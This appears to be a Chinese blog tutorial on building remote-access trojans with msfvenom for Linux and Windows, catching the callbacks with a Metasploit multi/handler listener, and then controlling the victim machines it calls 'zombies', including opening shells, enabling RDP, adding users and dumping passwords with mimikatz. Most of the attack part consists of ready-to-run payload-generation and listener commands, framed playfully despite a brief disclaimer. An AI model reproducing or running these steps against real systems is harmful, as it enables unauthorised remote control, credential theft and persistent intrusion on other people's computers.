msfvenom生成木馬-Linux Wondows
聲明:本篇內(nèi)容,禁止用作非法目的,謝絕一切形式的轉(zhuǎn)載。
當(dāng)你在無意間點擊一個鏈接后,當(dāng)你在不明情況安裝一個程序時,當(dāng)你忍不住點擊一個美女圖片的時候,你的設(shè)備可能就此淪陷了,成為了黑客眼中的"肉雞"。
kali Linux
Kali Linux是基于Debian的Linux發(fā)行版, 設(shè)計用于數(shù)字取證操作系統(tǒng)。由Offensive Security Ltd維護(hù)和資助。最先由Offensive Security的Mati Aharoni和Devon Kearns通過重寫B(tài)ackTrack來完成,BackTrack是他們之前寫的用于取證的Linux發(fā)行版 。
Metersploit
Metasploit是一款開源的安全漏洞檢測工具,可以幫助安全和IT專業(yè)人士識別安全性問題,驗證漏洞的緩解措施,并管理專家驅(qū)動的安全性進(jìn)行評估,提供真正的安全風(fēng)險情報。這些功能包括智能開發(fā),代碼審計,Web應(yīng)用程序掃描,社會工程。團(tuán)隊合作,在Metasploit和綜合報告提出了他們的發(fā)現(xiàn)。
Meterpreter
Meterpreter是 Metasploit 框架中的一個殺手锏,通常作為漏洞溢出后的攻擊在和使用, 攻擊在觸發(fā)漏洞后能夠返回給我們一個控制通道.
Linux攻擊
生成木馬
網(wǎng)絡(luò)上有好多生成木馬的方式,但是大多數(shù)都是相互copy,甚至有的還可能包含病毒,謹(jǐn)慎使用。網(wǎng)絡(luò)上下載的所有軟件都要慎用,除非是在官網(wǎng)上下載的。 生成一個使用于Linux 64位系統(tǒng)的木馬,生成木馬的命令如下:
msfvenom -a x64 --platform linux ?-p linux/x64/meterpreter/reverse_tcp ?LHOST=192.168.42.49 LPORT=5555 ?-i 3 -f elf -o test
LHOST 代表Listening host。LPORT代表Listening port。后續(xù)介紹網(wǎng)絡(luò)的時候會詳細(xì)講解。
翻譯一下這個命令:平臺Linux x64架構(gòu),使用payload是linux/x64/meterpreter/reverse_tcp,目標(biāo)文件的格式是elf。可執(zhí)行目標(biāo)文件的名稱是test。 通過上面的命令,我們就就可以生成一個elf格式的test程序,當(dāng)在遠(yuǎn)端(也就是"肉雞")執(zhí)行這個程序的時候,如果本地開啟了監(jiān)聽,肉雞和本機(jī)之間就建立了一條通信的channel,通過這個木馬就能實現(xiàn)控制遠(yuǎn)端的肉雞了,邪惡的微笑。
開啟監(jiān)聽
開啟msf
msfconsole
加載模塊
msf5 > use exploit/multi/handler
設(shè)置payload
msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
設(shè)置監(jiān)聽ip
msf5 exploit(multi/handler) > set lhost 192.168..42.49
設(shè)置監(jiān)聽port
msf5 exploit(multi/handler) > set LPORT 5555
執(zhí)行
msf5 exploit(multi/handler) > exploit
攻擊效果
當(dāng)執(zhí)行玩exploit之后,我們可以獲得一個Meterpreter。通過這個meterpreter,可以查看肉雞中的文件,進(jìn)程等。

可以開啟一個shell,這樣基本等同于完全操控目標(biāo)計算機(jī)了。


通過查看whoami可知正是當(dāng)前登陸用戶的帳號。如何提升權(quán)限,后續(xù)會介紹。
Windows攻擊
生成木馬
msfvenom -a x64 --platform windows ?-p windows/x64/meterpreter/reverse_tcp ?LHOST=192.168.42.49 LPORT=4444 ?-i 3 -f exe -o payload_test.exe
具體含義可參考上文。
開啟監(jiān)聽
開啟msf
msfconsole
加載模塊
msf5 > use exploit/multi/handler
設(shè)置payload
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
設(shè)置監(jiān)聽ip
msf5 exploit(multi/handler) > set lhost 192.168..42.49
設(shè)置監(jiān)聽port
msf5 exploit(multi/handler) > set LPORT 4444
執(zhí)行
msf5 exploit(multi/handler) > exploit
攻擊效果
當(dāng)執(zhí)行玩exploit之后,我們可以獲得一個Meterpreter。通過這個meterpreter,可以查看肉雞中的文件,進(jìn)程等。同Linux。

查看那getuid是Administrator,管理員權(quán)限。在Windows下,這還不是最高的權(quán)限,最高的權(quán)限是system,至于如何提權(quán),后續(xù)會講解。

開啟一個shell,發(fā)現(xiàn)有亂碼,這是由于Linux和Windows采用的編碼方式不一致導(dǎo)致的??梢酝ㄟ^ chcp65001
解決這個問題。
桌面截圖

開啟遠(yuǎn)程桌面
通過以下命令開啟rdp服務(wù)
run post/windows/manager/enable_rdp
如圖:

添加用戶

帳號密碼破解
使用minikatz進(jìn)行密碼破解

遠(yuǎn)程桌面
通過 rdestop目標(biāo)ip-u賬戶
,可以實現(xiàn)遠(yuǎn)程桌面的控制。


公眾號
更多內(nèi)容,歡迎關(guān)注我的公眾號:無情劍客
